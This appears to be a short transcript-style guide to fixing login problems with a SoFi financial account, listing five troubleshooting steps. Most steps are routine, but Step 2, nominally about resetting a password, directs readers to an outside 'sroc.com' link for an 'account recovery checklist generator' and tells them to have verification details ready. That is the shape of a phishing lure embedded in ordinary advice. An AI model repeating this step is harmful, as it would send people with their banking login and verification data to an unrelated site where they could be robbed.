If you're experiencing login issues on SoFi, follow these steps to troubleshoot and resolve the problem quickly. Step 1. Check your credentials. Ensure that you are entering the correct username and password. Double check for any typos or case sensitivity. Step 2. Reset your password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache. Sometimes cache data can cause login issues. Clear your browser's cache and cookies, then try logging in again. Step 4. Update your app. If you're using the SoFi mobile app, make sure it is updated to the latest version. Check your app store for any available updates. Step 5. Contact support. If none of the above steps work, reach out to SoFi customer support for assistance. They can help you troubleshoot further and resolve any account-specific issues. By following these steps, you should be able to resolve your login issues on SoFi quickly. If problems persist, don't hesitate to seek help from customer support.